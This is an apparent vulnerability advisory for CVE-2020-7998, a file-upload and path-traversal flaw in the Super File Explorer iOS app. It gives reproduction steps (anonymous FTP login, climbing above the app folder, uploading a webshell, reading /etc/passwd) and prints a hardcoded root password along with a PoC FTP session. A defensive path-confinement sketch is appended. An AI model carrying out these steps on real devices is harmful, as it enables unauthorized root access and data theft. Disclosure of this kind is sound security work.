Created
January 28, 2020 02:31
CVE-2020-7998 arbitrary file upload web vulnerability Super File Explorer app for iOS
An arbitrary file upload web vulnerability has been discovered in the
> Super File Explorer app for iOS.
> The vulnerability is located in the developer path that is accessible
> and hidden next to the root path.
> By default, there is no password set for the FTP or Web UI service.
> The arbitrary file
> upload web vulnerability can be exploited by remote attackers without
> a privileged application user account or user interaction. For security
> demonstration or to reproduce the vulnerability follow the provided
> information and steps below to continue.
>
> Manual steps to reproduce the vulnerability ...
> 1. Install the vulnerable mobile iOS application to your test iDevice (iPhone)
> 2. Start the mobile device software
> 3. Start the ftp and web-server via remote manager button push
> 4. Open the ftp via console and login as random user with any credentials
> 5. Move to the developer path in the upper folder
> 6. Upload a webshell from a remote system or the local system path via network
> 7. Open ftp web ui url (http://localhost) and move to the developer path
> 8. Open the webshell and request via GET the "/etc/passwd" file that is accessible
> 9. Login again to the ftp server using the root:smx7MYTQIi2M
> 10. Successful root access to compromise the ftp server and mobile via arbitrary file upload vulnerability!
>
> FTP WEB UI URL: http://localhost
>
> FTP SERVER URL: localhost:2121
>
> --- PoC Exploitation ---
> C:\Users\Admin>ftp
> ftp> open 192.168.2.241 2121
> Verbindung mit 192.168.2.241 wurde hergestellt.
> 220 iosFtp server ready.
> 502 Unknown command 'UTF8'
> Benutzer (192.168.2.241:(none)): anonymous
> 331 Password required for anonymous
> Kennwort: a@b.com
> 230 User anonymous logged in.
> ftp> cd ..
> 250 CWD command successful.
> ftp> dir
> 200 PORT command successful.
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 3
> drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 Documents
> drwxr-xr-x 3 mobile mobile 170 Feb 17 22:05 Library
> drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 tmp
> 226 Transfer complete.
> FTP: 199 Bytes empfangen in 0.01Sekunden 13.27KB/s
> ftp> cd /../
> 250 CWD command successful.
> ftp> dir
> 200 PORT command successful.
> 150 Opening ASCII mode data connection for '/bin/ls'.
> total 13
> ---------- 1 (null) (null) 0 (null) Applications
> drwxrwxr-x 1 root admin 68 May 29 23:45 Developer
> ---------- 1 (null) (null) 0 (null) Library
> ---------- 1 (null) (null) 0 (null) System
> ---------- 1 (null) (null) 0 (null) bin
> ---------- 1 (null) (null) 0 (null) cores
> ---------- 1 (null) (null) 0 (null) dev
> ---------- 1 (null) (null) 0 (null) etc
> ---------
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Arbitrary File Upload Vulnerability
>
> ------------------------------------------
>
> [Vendor of Product]
> Super File Explorer 1.0.
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Super File Explorer 1.0. - le Explorer 1.0.
>
> ------------------------------------------
>
> [Affected Component]
> LZX Apps
> Product: Super File Explorer - File Viewer & File Manager (Wifi UI & FTP) 1.0.1
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true
>
> ------------------------------------------
>
> [Discoverer]
> Adesh Nandkishor Kolte
>
> ------------------------------------------
>
> [Reference]
> https://apps.apple.com/us/app/super-file-explorer-file-viewer-file-manager/id1101973946
Use CVE-2020-7998.
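
Added example (not part of the original report and not the app's code): in the PoC session the server answers "cd .." and "cd /../" with 250 and lists directories above the app's own folder. A file server avoids this by resolving every CWD/STOR/RETR argument against a fixed share root and rejecting anything that lands outside it. The names resolve_ftp_path, share_root and PathEscape are assumptions made for this sketch.

```python
import os
import posixpath


class PathEscape(Exception):
    """Client-supplied path resolves outside the shared directory."""


def resolve_ftp_path(share_root, cwd, arg):
    """Map a CWD/STOR/RETR argument to (virtual_path, real_path).

    share_root: directory the server is meant to expose (assumed name).
    cwd: session's current virtual directory, where "/" means share_root.
    """
    # Absolute arguments restart at the virtual root; relative ones extend cwd.
    virtual = arg if arg.startswith("/") else posixpath.join(cwd, arg)

    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            # "cd .." at the virtual root is where the session above left
            # the app's folder; refuse instead of walking up.
            if not parts:
                raise PathEscape(arg)
            parts.pop()
        else:
            parts.append(comp)

    # Second check on the real filesystem: a symlink inside the share must
    # not lead back out of it either.
    root = os.path.realpath(share_root)
    real = os.path.realpath(os.path.join(root, *parts))
    if os.path.commonpath([root, real]) != root:
        raise PathEscape(arg)
    return "/" + "/".join(parts), real
```

A server using this check would answer 550 on PathEscape instead of 250, and would apply the same function to upload targets so that a file can only be written below the share root.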